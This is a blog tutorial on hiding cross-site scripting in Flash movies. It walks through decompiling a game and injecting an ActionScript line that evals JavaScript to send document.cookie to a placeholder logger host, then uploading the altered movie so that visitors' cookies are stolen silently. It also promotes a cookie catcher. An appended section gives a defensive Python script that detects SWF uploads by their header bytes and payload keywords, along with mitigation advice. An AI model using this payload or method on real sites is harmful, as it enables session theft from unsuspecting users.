Wednesday, 25 September 2013

How to hide XSS in flash movies/games

[Image: Adobe-moves-to-patch-zero-day-XSS-vulner...ge2_70.jpg]

Here is a tutorial on how to rip and edit an existing Flash movie or game for use in XSS attacks. The objective is to steal cookies silently, without changing the movie's behaviour from the user's point of view.

When a site lets you upload .swf (Flash) files, or embeds a Flash file as an object, it may be possible to turn that into an XSS vulnerability, because ActionScript in a SWF served from the site's own domain can call JavaScript in the hosting page. The embed parameter allowScriptAccess controls this: its default is "sameDomain", which permits the call whenever the SWF comes from the same domain as the page, so the attack works unless the embed code explicitly sets allowScriptAccess=never. Note that the embed parameter only protects that one embedding page; if a victim can be sent straight to the .swf URL, the movie runs in the site's origin on its own.

Some tools needed:
    A SWF file decompiler (link) (note: I have the full version, the demo is limited)
    A FLA editor (I use Adobe Flash CS6)

Through ActionScript, Flash's scripting language, a SWF can invoke JavaScript functions in the hosting page via ExternalInterface.call(), including the page's own eval, which means it can run arbitrary script there. We will decompile an existing movie, inject some cookie-stealing code into one of its ActionScript frame scripts, and recompile it. This works in the major browsers and is compatible with both ActionScript 2 and 3 (the latest version).

Step 1:
Navigate to a page where a Flash movie or game loads and either check the page source for the URL of the Flash file (ending in .swf), or, as shown below, use Firefox's Tools > Page Info > Media and choose Save As to download it.
[Image: ZrZOvyt.png]

Step 2:
Once you have the Sothink decompiler, open the file you just downloaded and export it as a .fla file:

[Image: iKBfvXO.png]

Step 3:
Open the .fla file in your editor (Adobe Flash CS6 in my case), select the first frame of the movie and right-click > Actions. This brings up the ActionScript editor.

[Image: bxg3iC6.png]

Step 4:
Find the ActionScript at the start of the scene and, before any other code, paste the following (the URL is a placeholder for your own logging endpoint):

// eval runs in the hosting page's origin; encodeURIComponent keeps the cookie string intact in the query
flash.external.ExternalInterface.call("eval", "var a = new XMLHttpRequest(); a.open('get', 'http://YourEvilSite.com/logger.php?cookie=' + encodeURIComponent(document.cookie)); a.send();");

[Image: veZhfdm.png]

Step 5:

From the File menu, select Export > Export Movie:

[Image: yKEytXE.png]

Step 6:

The file is now ready to be uploaded or embedded on the target site. It should operate as normal, but behind the scenes whoever loads it will have their cookies sent to your logger. Two caveats: cookies flagged HttpOnly are not exposed to document.cookie, so only the cookies the site forgot to protect will arrive, and the request is only made when the container permits script access (see the note on allowScriptAccess above). May I recommend a cookie catcher I prepared earlier!? (link).

[Image: D9O2Al6.png]
[Image: ukRbpVM.png]
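As an added example (not code from the original post), here is a defender-side triage script in Python that shows why an extension or Content-Type check alone does not stop this trick: Flash Player decided whether a file was a movie from its first three bytes (FWS, CWS or ZWS), not from its name, so a recompiled SWF renamed to .gif still plays when embedded with an object tag. The script reads the SWF header, decompresses zlib (CWS) and LZMA (ZWS) bodies with bounded output, and searches the tag data for the strings an ExternalInterface payload leaves behind. The file names and bodies are constructed sample data, and the string match is a heuristic: a payload that assembles class names at runtime will evade it.

```python
"""Triage uploaded files for Flash content.

Added example, not code from the original post.  Flash Player decided whether a
file was a movie from its first three bytes (FWS, CWS or ZWS), not from the file
extension or Content-Type, so an upload filter has to inspect the bytes.
Sample file names and bodies below are constructed test data.
"""
import lzma
import struct
import zlib
from typing import Optional, Tuple

SWF_SIGNATURES = {b"FWS": "none", b"CWS": "zlib", b"ZWS": "lzma"}
MAX_BODY = 32 << 20  # cap decompressed output so a crafted upload cannot act as a decompression bomb

# Strings an ExternalInterface-based payload leaves in the tag data, whether the
# movie is ActionScript 2 (DoAction string pushes) or 3 (DoABC constant pool).
SUSPICIOUS_STRINGS = (b"ExternalInterface", b"eval", b"document.cookie", b"XMLHttpRequest")


def parse_swf_header(data: bytes) -> Optional[Tuple[str, int, int]]:
    """Return (compression, version, declared uncompressed length), or None if not a SWF."""
    if len(data) < 8 or data[:3] not in SWF_SIGNATURES:
        return None
    return SWF_SIGNATURES[data[:3]], data[3], struct.unpack("<I", data[4:8])[0]


def _lzma_body(data: bytes) -> bytes:
    """Decode a ZWS body: 4-byte compressed length, 5-byte LZMA props, raw LZMA1 stream."""
    props = data[12:17]
    lc, rest = props[0] % 9, props[0] // 9
    lp, pb = rest % 5, rest // 5
    dict_size = struct.unpack("<I", props[1:5])[0]
    if dict_size > 64 << 20:  # the decoder allocates the dictionary up front; refuse absurd sizes
        raise ValueError("implausible LZMA dictionary size %d" % dict_size)
    dec = lzma.LZMADecompressor(
        format=lzma.FORMAT_RAW,
        filters=[{"id": lzma.FILTER_LZMA1, "dict_size": dict_size, "lc": lc, "lp": lp, "pb": pb}],
    )
    return dec.decompress(data[17:], MAX_BODY)


def swf_body(data: bytes) -> bytes:
    """Return the tag data after the 8-byte header, decompressed where necessary."""
    header = parse_swf_header(data)
    if header is None:
        raise ValueError("not a SWF")
    compression = header[0]
    if compression == "none":
        return data[8:]
    if compression == "zlib":
        return zlib.decompressobj().decompress(data[8:], MAX_BODY)
    return _lzma_body(data)


def triage_upload(filename: str, data: bytes) -> dict:
    """Report whether an upload is Flash content and which payload strings it carries."""
    header = parse_swf_header(data)
    if header is None:
        return {"is_swf": False, "filename": filename}
    compression, version, declared_length = header
    try:
        body = swf_body(data)
        hits = sorted(s.decode() for s in SUSPICIOUS_STRINGS if s in body)
        length_ok = declared_length == 8 + len(body)  # header counts toward the declared length
    except (zlib.error, lzma.LZMAError, struct.error, ValueError, IndexError) as exc:
        hits, length_ok = ["undecodable body: %s" % exc], False
    return {
        "is_swf": True,
        "filename": filename,
        "masquerading": not filename.lower().endswith(".swf"),  # SWF bytes behind another extension
        "compression": compression,
        "version": version,
        "declared_length": declared_length,
        "length_ok": length_ok,
        "suspicious_strings": hits,
    }


def make_swf(body: bytes, compress: bool = False, version: int = 10) -> bytes:
    """Build a structurally valid (not playable) SWF around a body, for exercising the filter."""
    signature = b"CWS" if compress else b"FWS"
    header = signature + bytes([version]) + struct.pack("<I", 8 + len(body))
    return header + (zlib.compress(body) if compress else body)


# Constructed bodies: one innocuous, one carrying the strings that an
# ExternalInterface.call("eval", ...) cookie stealer leaves in a movie.
CLEAN_BODY = b"\x00" * 16 + b"gotoAndPlay\x00"
EVIL_BODY = (b"\x00" * 16 + b"flash.external\x00ExternalInterface\x00call\x00eval\x00"
             b"var a = new XMLHttpRequest(); /* ... */ document.cookie\x00")

if __name__ == "__main__":
    samples = [
        ("banner.swf", make_swf(CLEAN_BODY)),
        ("game.swf", make_swf(EVIL_BODY, compress=True)),
        ("avatar.gif", make_swf(EVIL_BODY)),  # SWF renamed to slip past an extension check
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 20),
    ]
    for name, blob in samples:
        print(triage_upload(name, blob))
```

Rejecting or quarantining anything that parses as a SWF is only half the fix; serve user uploads from a separate origin, or with Content-Disposition: attachment, so that a movie that does slip through cannot run script in the application's origin.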

Demo (cookie stealing code replaced with alert box): http://dfu123.comule.com/swfxss.swf
(If you find this useful, why not check out an advert below to support the blog? :O ) ~r0ng

